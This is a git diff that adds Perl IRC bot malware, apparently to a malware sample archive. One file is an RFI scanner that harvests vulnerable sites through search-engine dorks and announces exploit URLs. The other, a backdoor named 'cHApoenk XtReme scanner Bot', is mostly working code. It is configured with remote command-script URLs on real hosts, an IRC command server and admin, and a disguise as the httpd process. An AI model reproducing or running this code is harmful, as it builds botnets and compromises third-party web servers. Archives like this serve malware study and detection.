&privmsg($chan,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?"); + &privmsg($admin,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?"); + &privmsg($admin,"9[11SpreaD9]: 7"."http://" . $sito . $bug . "4" . $spread . "?"); + + } + exit(0); + } + if($contatore %200 == 0){ + &privmsg($chan,"9[10Ricerca9]: 7Scannati ".$contatore." di ".$testx); + } + $startx++; + } + my $start = 0; + foreach my $f(@forks){ + waitpid($f,0); + $forks[$start--]; + $start++; + } + &privmsg($chan,"9[10Ricerca4]:".$bug .$dork); + &privmsg($chan,"9[10Ricerca4]: 7Fine."); +} + +sub privmsg(){ + my ($cha,$cosi)=@_; + print $sock "PRIVMSG ".$cha." :".$cosi."\r\n"; +} + +sub Google(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=100; + my $max=100*10; + my @dom = &GoogleDomains(); + my $file = "google.txt"; + my $html; + my @result; + foreach my $dominio (@dom){ + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://www.google.".$dominio."/search?q=".$dork."&num=100&hl=de&cr=countryDE&start=".$start."&sa=N"); + } + } + while($html =~ m/<h2 class=r><a href=\"http:\/\/(.+?)\"/g){ + $1 =~ /google/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Yahoo(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=100; + my $max=100*10; + my $file = "yahoo.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".$dork."&results=".$num."&start=".$start); + } + while($html =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){ + $1 =~ /yahoo/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Altavista(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=100; + my $max=100*10; + my $file = "altavista.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://de.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=".$dork."&aqp=&aqo=&aqn=&kgs=1&kls=1&filetype=&rc=dmn&swd=&lh=&nbq=50&stq=".$start); + } + while($html =~ m/<span class=ngrn>(.+?)\ <\/span>/g){ + if($1 !~ /yahoo/ && $1 !~ /Altavista/){ + push(@result,&Links($1,$file)); + } + } + return(@result); +} + +sub Gigablast(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $max=99; + my $file = "gigablast.txt"; + my $html; + my @result; + for($start=1;$start < $max; $start += 1){ + $html.=&Query("http://suche.lycos.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&SITE=de&cat=loc&enc=utf-8"); +} + while($html =~ m/href=\"(.+?)\"/g){ + push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Msn(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=10; + my $max=100*10; + my $file = "msn.txt"; + my $html; + my @result; + for($start=1;$start < $max; $start += $num){ + $html.=&Query("http://search.live.com/results.aspx?q=".$dork."&lf=1&rf=1&first=".$start); + } + while($html =~ m/<a href=\"http:\/\/(.+?)\"/g){ + $1 =~ /msn/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Ask(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=1; + my $max=100; + my $file = "ask.txt"; + my $html; + my @result; + for($start=1;$start < $max; $start += $num){ + $html.=&Query("http://search.ilse.nl/web?rid=PREV&pagnum=".$start."&search_for=".$dork); + } + while($html =~ m/\">(.+?)<\/a>/g){ + $1 =~ /ask/ || push(@result,&Links($3,$file)); + } + return(@result); +} + +sub Fireball(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=1; + my $max=99; + my $file = "fireball.txt"; + my $html; + my @result; + for($start=1;$start < $max; $start += $num){ + $html.=&Query("http://search-dyn.tiscali.de/search.php?key=".$dork."&collection=de&tiscalitype=web&hits=10&language=de&maxCount=&collapse=on&spell=suggest&pg=".$start."&offset=".(($start-1)*10)."&xargs="); + } + while($html =~ m/onmouseover=\"window.status=\'http:\/\/(.+?)\'/g){ + $1 =~ /tiscali/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Alltheweb(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=100; + my $max=100*10; + my $file = "alltheweb.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start); + } + while($html =~ m/<span class=\"resURL\">http:\/\/(.+?)\ /g){ + $1 =~ /alltheweb/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Aol(){ + my($dork)=@_; + $dork=&Key($dork); + my $start; + my $num=1; + my $max=100; + my $file = "aol.txt"; + my $html; + my @result; + for($start=0;$start < $max; $start += $num){ + $html.=&Query("http://suche.aol.de/aol/search?query=".$dork."&page=".$start."&nt=SG2&langRestrict=2&q=".$dork."&rp=lang_de"); + } + while($html =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){ + $1 =~ /aol/ || push(@result,&Links($1,$file)); + } + return(@result); +} + +sub Query(){ + my($link,$timeout)=@_; + my $req=HTTP::Request->new(GET=>$link); + my $ua=LWP::UserAgent->new(); + $ua->agent($User_Agent[rand(scalar(@User_Agent))]); + $ua->timeout($timeout); + my $response=$ua->request($req); + return $response->content; +} + +sub Key(){ + my $chiave=$_[0]; + $chiave =~ s/ /\+/g; + $chiave =~ s/:/\%3A/g; + $chiave =~ s/\//\%2F/g; + $chiave =~ s/&/\%26/g; + $chiave =~ s/\"/\%22/g; + $chiave =~ s/\\/\%5C/g; + $chiave =~ s/,/\%2C/g; + return $chiave; +} + +sub GetLink(){ + my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt"); + my $link; + my @total; + foreach my $n (@file){ + open(F,'<',$n); + while($link = <F>){ + $link=~s/[\r\n]//g; + push(@total,$link); + } + close(F); + } + return(@total); +} + +sub Remove(){ + my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt"); + foreach my $n (@file){ + system("rm -rf ".$n); + } +} + +sub Links(){ + my ($link,$file_print) = @_; + my $host = $link; + my $host_dir = $host; + my @links; + $host_dir=~s/(.*)\/[^\/]*$/\1/; + $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $host_dir=&End($host_dir); + $host=&End($host); + $link=&End($host); + push(@links,$link,$host,$host_dir); + open($file,'>>',$file_print); + print $file "$link\n$host_dir\n$host\n"; + close($file); + return @links; +} + +sub End(){ + $stringa=$_[0]; + $stringa.="/"; + $stringa=~s/\/\//\//; + while($stringa=~/\/\//){ + $stringa=~s/\/\//\//; + } + return($stringa); +} + +sub Unici{ + my @unici = (); + my %visti = (); + foreach my $elemento ( @_ ){ + next if $visti{ $elemento }++; + push @unici, $elemento; + } + return @unici; +} + +sub Agent(){ + my @ret = ( + "Microsoft Internet Explorer/4.0b1 (Windows 95)", + "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)", + "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)", + "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)", + "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)", + "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)", + "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)", + "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", + "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)", + "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", + "Microsoft Pocket Internet Explorer/0.6", + "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)", + "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;", + "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)", + "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)", + "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)", + "Advanced Browser (http://www.avantbrowser.com)", + "Avant Browser (http://www.avantbrowser.com)", + "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)", + "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)", + "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)", + "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007", + "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511", + "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0", + "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox", + "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4", + "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6", + "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", + "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", + "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", + "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1", + "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0", + "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b", + "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0", + "Mozilla/3.0 (OS/2; U)", + "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)", + "Mozilla/4.61 (Macintosh; I; PPC)", + "Mozilla/4.61 [en] (OS/2; U)", + "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)", + "Mozilla/4.8 [en] (Windows NT 5.0; U)" ); +return(@ret); +} +sub GoogleDomains(){ + my @dom = ("at","ch","de","fr","gr","nl","pt","co.uk","be"); +return(@dom); +} + + + diff --git a/Perl/Backdoor.Perl.IRCBot.y b/Perl/Backdoor.Perl.IRCBot.y new file mode 100644 index 00000000..1de59251 --- /dev/null +++ b/Perl/Backdoor.Perl.IRCBot.y @@ -0,0 +1,2114 @@ +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +################################# + +###################### +use HTTP::Request; +use LWP::UserAgent; +###################### +my $processo = '/usr/sbin/httpd'; +###################### +##################################################################### +#/!\ .:CONFIGURATION:. /!\# +##################################################################### +############################################ +my $linas_max='8'; +#----------------- # +# Maximum Lines for Anti Flood # +############################################# +my $sleep='5'; +#----------------- # +#Sleep Time # +############################################ +my $cmd="http://www.headwatersinc.org/newsroom/images/billgate.txt??"; +#----------------- # +#CMD that is printed in the channel # +############################################ +my $id="http://www.ads.dynahoo.com/images/test.txt?"; +#----------------- # +#ID = Response CMD # +############################################ +my $spread="http://www.ads.dynahoo.com/images/er.txt"; +#----------------- # +#Spreader # +############################################ +my @adms=("billgate"); +#my @hostauth=("1980"); +#----------------- # +#Admins of the Bot set your nickname here # +############################################ +my @canais=("#indohackerlink"); +#----------------- # +#Put your channel here # +############################################ +my @nickname = ("Abdulrazak","Ackerman","Adams","Addison","Adelstein","Adibe","Adorno","Ahlers","Alavi","Alcorn","Alda", "Aleks","Allison","Alongi","Altavilla","Altenberger","Altenhofen","Amaral","Amatangelo","Ameer","Amsden","Anand","Andel", "Ando","Andrelus","Andron","Anfinrud","Ansley","Anthony","Antos","Arbia","Arduini","Arellano","Aristotle","Arjas","Arky","Atkins", "Augustus","Aurelius","Axelrod","Axworthy","Ayiemba","Aykroyd","Ayling","Azima","Bachmuth","Backus","Bady","Baglivo","Bagnold", "Bailar","Bakanowsky","Baleja","Ballatori","Ballew","Baltz","Banta","Barabesi","Barajas","Baranczak","Baranowska","Barberi","Barbetti", "Barneson","Barnett","Barriola","Barry","Bartholomew","Bartolome","Bartoo","Basavappa","Bashevis","Batchelder","Baumiller","Bayles","Bayo", "Beacon","Beal","Bean","Beckman","Beder","Bedford","Behenna","Belanger","Belaoussof","Belfer","Belin-Collart","Bellavance","Bellhouse", "Bellini","Belloc","Benedict-Dye","Bergson","Berke-Jenkins","Bernardo", "Bernassola","Bernston","Berrizbeitia","Betti","Beynart","Biagioli", "Bickel","Binion","Bir","Bisema","Bisho","Blackbourn","Blackwell","Blagg","Blakemore","Blanke","Bliss","Blizard","Bloch","Bloembergen", "Bloemhof","Bloxham","Blyth","Bolger","Bolick","Bollinger","Bologna","Boner","Bonham","Boniface","Bontempo","Book","Bookbinder","Boone", "Boorstin","Borack","Borden","Bossi","Bothman","Botosh","Boudin","Boudrot","Bourneuf","Bowers","Boxer","Boyajian","Boyes","Boyland", "Boym", "Boyne","Bracalente","Bradac","Bradach","Brecht","Breed","Brenan","Brennan","Brewer","Brewer","Bridgeman","Bridges","Brinton", "Britz","Broca","Brook","Brzycki","Buchan","Budding","Bullard","Bunton","Burden","Burdzy","Burke","Burridge","Busetta","Byatt","Byerly", "Byrd","Cage","Calnan","Cammelli","Cammilleri","Canley","Capanni","Caperton","Capocaccia","Capodilupo","Cappuccio","Capursi","Caratozzolo", "Carayannopoulos","Carlin","Carlos","Carlyle","Carmichael","Caroti","Carper","Cartmill","Cascio","Case","Caspar","Castelda","Cavanagh", "Cavell","Ceniceros","Cerioli","Chapman","Charles","Cheang","Cherry","Chervinsky","Chiassino","Chien","Childress","Childs","Chinipardaz", "Chinman","Christenson","Christian","Christiano","Christie","Christopher","Chu","Chupasko","Church","Ciampaglia","Cicero","Cifarelli", "Claffey","Clancy","Clark","Clement","Clifton","Clow","Coblenz","Coito","Coldren","Colella","Collard","Collis","Compton","Compton", "Comstock","Concino","Condodina","Connors","Corey","Cornish","Cosmides","Counter","Coutaux","Crawford","Crocker","Croshaw","Croxen", "Croxton","Cui","Currier","Cutler","Cvek","Cyders","daSilva","Daldalian","Daly","D'Ambra","Danieli","Dante","Dapice","D'arcangelo","Das", "Dasgupta","Daskalu","David","Dawkins","DeGennaro","DeLaPena","del'Enclos","deRousse","Debroff","Dees","Defeciani","Delattre","Deleon-Rendon", "Delger","Dell'acqua","Deming","Dempster","Demusz","Denault","Denham","Denison","Desombre","Deutsch","D'fini","Dicks","Diefenbach","Difabio", "Difronzo","Dilworth","Dionysius","Dirksen","Dockery","Doherty","Donahue","Donner","Doonan","Dore","Dorf","Dosi","Doty","Doug","Dowsland", "Drinker","D'souza","Duffin","Durrett","Dussault","Dwyer","Eardley","Ebeling","Eckel","Edley","Edner","Edward","Eickenhorst","Eliasson", "Elmendorf","Elmerick","Elvis","Encinas","Enyeart","Eppling","Erbach","Erdman","Erdos","Erez","Espinoza","Estes","Etter","Euripides", "Everett","Fabbris","Fagan","Faioes","Falco-Acosta","Falorsi","Faris","Farone","Farren","Fasso'","Fates","Feigenbaum","Fejzo","Feldman", "Fernald","Fernandes","Ferrante","Ferriell","Feuer","Fido","Field","Fink","Finkelstein","Finnegan","Fiorina","Fisk","Fitzmaurice","Flier", "Flores","Folks","Forester","Fortes","Fortier","Fossey","Fossi","Francisco","Franklin-Kenea","Franz","Frazier-Davis","Freid","Freundlich", "Fried","Friedland","Frisken","Frowiss","Fryberger","Frye","Fujii-Abe","Fuller","Furth","Fusaro","Gabrielli","Gaggiotti","Galeotti","Galwey", "Gambini","Garfield","Garman","Garonna","Geller","Gemberling","Georgi","Gerrett","Ghorai","Gibbens","Gibson","Gilbert","Gili","Gill","Gillispie", "Gist","Gleason","Glegg","Glendon","Goldfarb","Goncalves","Good","Goodearl","Goody","Gozzi","Gravell","Greenberg","Greenfeld","Griffiths", "Grigoletto","Grummell","Gruner","Gruppe","Guenthart","Gunn","Guo","Ha","Haar","Hackman","Hackshaw","Haley","Halkias","Hallowell","Halpert", "Hambarzumjan","Hamer","Hammerness","Hand","Hanssen","Harding","Hargraves","Harlow","Harrigan","Hartman","Hartmann","Hartnett","Harwell", "Haviaras","Hawkes","Hayes","Haynes","Hazlewood","Heermans","Heft","Heiland","Hellman","Hellmiss","Helprin","Hemphill","Henery","Henrichs", "Hernandez","Herrera","Hester","Heubert","Heyeck","Himmelfarb","Hind","Hirst","Hitchcock","Hoang","Hock","Hoffer","Hoffman","Hokanson","Hokoda", "Holmes","Holoien","Holter","Holway","Holzman","Hooker","Hopkins","Horsley","Hoshida","Hostage","Hottle","Howard","Hoy","Huey","Huidekoper", "Hungerford","Huntington","Hupp","Hurtubise","Hutchings","Hyde","Iaquinta","Ichikawa","Igarashi","Inamura","Inniss","Isaac","Isaievych","Isbill", "Isserman","Iyer","Jacenko","Jackson","Jagers","Jagger","Jagoe","Jain","Jamil","Janjigian","Jarnagin","Jarrell","Jay","Jeffers","Jellis", "Jenkins","Jespersen","Jewett","Johannesson","Johannsen","Johns","Jolly","Jorgensen","Jucks","Juliano","Julious","Kabbash","Kaboolian","Kafadar", "Kalbfleisch","Kaligian","Kalil","Kalinowski","Kalman","Kamel","Kangis","Karpouzes","Kassower","Kasten","Kawachi","Kee","Keenan","Keepper", "Keith","Kelker","Kelsey","Kempton","Kemsley","Kendall","Kerry","Keul","Khong","Kimmel","Kimmett","Kimura","Kindall","Kinsley","Kippenberger", "Kirscht","Kittridge","Kleckner","Kleiman","Kleinfelder","Klemperer","Kling","Klinkenborg","Klint","Knuff","Kobrick","Koch","Kohn","Koivumaki", "Kommer","Koniaris","Konrad","Kool","Korzybski","Kotter","Kovaks","Kraemer","Krailo","Krasney","Kraus","Kroemer","Krysiak","Kuenzli","Kumar", "Kusman","Kuwabara","La","Labunka","Lafler","Laing","Lallemant","Landes","Lankes","Lantieri","Lanzit","Laserna","Lashley","Lawless","Lecar", "Lecce","Leclercq","Leite","Lenard","Sofia","Lesser","Lessi","Liakos","Lidano","Liem","Light","Lightfoot","Lim","Linares","Linda","Linder", "Line","Linehan","Linzee","Lippmann","Lipponen","Little","Litvak","Livernash","Livi","Livolsi","Lizardo","Locatelli","Longworth","Loss","Loveman", "Lowenstein","Loza","Lubin","Lucas","Luciano","Luczkow","Luecke","Lunetta","Luoma","Lussier","Lutcavage","Luzader","Ma","Maccormac","Macdonald", "Maceachern","Macintyre","Mackenney","MacMillan","Macy","Madigan","Maggio","Mahony","Maier","Maine-Hershey","Maisano","Malatesta","Maller", "Malova","Manalis","Mandel","Manganiello","Mantovan","March","Marchbanks","Marcus","Margalit","Margetts","Marques","Martinez","Martochio", "Marton","Marubini","Mass","Matalka","Matarazzo","Matsukata","Mattson","Mauzy","May","Mazzali","Mazziotta","Mcbride","Mccaffery","Mccall", "Mcclearn","Mcdowell","Mcelroy","McFadden","Mcghee","Mcgoldrick","McIlroy","Mcintosh","Mcdonald","Mclane","Mclaren","Mcnealy","Mcnulty", "Meccariello","Memisoglu","Menzies","Merikoski","Merlani","Merminod","Merseth","Merz","Metelka","Metropolis","Meurer","Michelman","Middle", "Mieher","Mills","Minh","Mini","Minichiello","Gonzalez","Mitropoulos","Mittal","Mocroft","Modestino","Moeller","Mohr","Moiamedi","Monque","Montilio", "MooreDeCh.","Morani","Moreton","Morrison","Morrow","Mortimer","Mosher","Mosler","Mostafavi","Motooka","Mudarri","Muello","Mugnai","Mulkern", "Mulroy","Mumford","Mussachio","Naddeo","Napolitano","Nardi","Nardone","Naviaux","Nayduch","Nelson","Nenna","Nesci","Neuman","Newfeld","Newlin", "Ng","Ni","Nickerson","Nickoloff","Nisenson","Nitabach","Notman","Nuzum","Ocougne","Ogata","Oh","O'hagan","Oldford","Olsen","Olson","Olszewski", "O'malley","Oman","O'meara","Opel","Oray","Orfield","Orsi","Ospina","Ostrowski","Ottaviani","Otten","Ouchida","Ovid","PaesDealmeida","Paine", "Palayoor","Palepu","Pallara","Palmitesta","Panadero","Panizzon","Pantilla","Paoletti","Parmeggiani","Parris","Partridge","Pascucci","Patefield", "Patrick","Pattullo","Pavetti","Pavlon","Pawloski","Paynter","Peabody","Pearlberg","Pederson","Peishel","Penny","Pereira","Perko","Perlak", "Perlman","Perna","Perone","Perrimon","Peters","Petruzello","Pettibone","Pettit","Pfister","Pilbeam","Pinot","Plancon","Plant","Plasket","Plous", "Po","Pocobene","Poincaire","Pointer","Poirier","Polak","Polanyi","Politis","Poma","Poolman","Powers","Presper","Preucel","Prevost","Pritchard", "Pritz","Proietti","Prothrow-Stith","Puccia","Pugh","Pynchon","Quaday","Quetin","Rabe","Rabkin","Radeke","Rajagopalan","Raney","Rangan","Rankin", "Rapple","Rayport","Redden-Tyler","Reedquist","Cunningham","Reinold","Remak","Renick","Repetto","Resnik","Rhea","Richmond","Rielly","Rindos", "Rineer","Rish","Rivera","Robinson","Rocha","Roesler","Rogers","Ronen","Row","Royal","Ru","Ruan","Ruderman","Ruescher","Rush","Ryu","Sabatello", "Sadler","Safire","Sahu","Sali","Samson","Sanchez-Ramirez","Sanna","Sapers","Sarin","Sartore","Sase","Satin","Satta","Satterthwaite","Sawtell", "Sayied","Scarponi","Scepan","Scharf","Scharlemann","Scheiner","Schiano","Schifini","Schilling","Schmitt","Schossberger","Schuman","Schutte", "Schuyler","Schwan","Schwickrath","Scovel","Scudder","Seaton","Seeber","Segal","Sekler","Selvage","Sen","Sennett","Seterdahl","Sexton", "Seyfert","Shaikh","Shakis","Shankland","Shanley","Shar","Shatrov","Shavelson","Shea","Sheats","Shepherd","Sheppard","Shepstone","Shesko","Shia", "Shibata","Shimon","Siesto","Sigalot","Sigini","Signa","Silverman","Silvetti","Sinsabaugh","Sirilli","Sites","Skane","Skerry","Skoda","Sloan", "Slowe","Smilow","Sniffen","Snodgrass","Socolow","Solon","Somers","Sommariva","Sorabella","Sorg","Sottak","Soukup","Soule","Soultanian","Spanier", "Sparrow","Spaulding","Speizer","Spence","Sperber","Spicer","Spiegelhalter","Spiliotis","Spinrad","StMartin","Stalvey","Stam","Stang","Stassinopolus", "States","Statlender","Stefani","Steiner","Stephanian","Stepniewska","Stewart-Oaten","Stiepock","Stillwell","Stock","Stockton","Stockwell","Stolzenberg", "Stonich","Storer","Stott","Strange","Strauch","Streiff","Stringer","Sullivan","Sumner","Suo","Surdam","Sweeting","Sweetser","Swindle","Tagiuri", "Tai", "Talaugon","Tambiah","Tandler","Tanowitz","Tatar","Taveras","Tawn","Tcherepnin","Teague","Temes","Temmer","Tenney","Terracini","Than", "Thavaneswaran","Theodos","Thibault","Thisted","Thomsen","Throop","Tierney","Till","Timmons","Tofallis","Tollestrup","Tolls","Tolman","Tomford", "Toomer","Topulos","Torresi","Torske","Towler","Toye","Traebert","Trenga","Trewin","Tringali","Troiani","Troy","Truss","Tsiatis","Tsomides","Tsukurov", "Tuck","Tudge","Tukan","Turano","Turek","Tuttle","Twells","Tzamarias","Ullman","Untermeyer","Upsdell","Urban","Urdang-Brown","Usdan","Uzuner", "Vacca","Waite","Valberg","Valencia","Wales","Wallenberg","Walter","vanAllen","VanZwet","Vandenberg","Vanheeckeren","Warshafsky","Wasowska","Vasquez", "Waugh","Weighart","Weingarten","Weinhaus","Weissbourd","Weissman","Velasquez","Welles","Welsh","Wengret","Venne","Verghese","Wescott","Wetzel", "Whately","Whilton","White","Whitla","Whittaker","Viana","Viano","Wiedersheim","Wiener","Viens","Vignola","Wilder","Wilhelm","Wilk","Wilkin","Wilkinson", "Villarreal","Willstatter","Wilson","Vitali","Viviani","Voigt","Wolk","VonHoffman","Woo","Wooden","Woods","Woods-Powell","Vorhaus","Votey","Yacono", "Yamane","Yankee","Yarchuk","Yates","Ybarra","Yedidia"); +my $nick = $nickname[rand scalar @nickname]; +#----------------- # +#Nickname of bot # +############################################ +my $ircname ='indolinux'; +chop (my $realname = '[indohack]'); +#----------------- # +#IRC name and Realname # +############################################ +$servidor='irc.ganteng.la' unless $servidor; +my $porta='6667'; +#----------------- # +#IRCServer and port # +############################################ +##################################################################### +#/!\ .:CONFIGURATION:. /!\# +##################################################################### +###################### +#End of Configuration# +# # +###################### +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% + +#Connect +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Masalah fork: $!" unless defined($pid); + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", + PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} + +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + for(my $c=0; $c<= $#lines; $c++) { + + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.17 ddido\001"); + } + 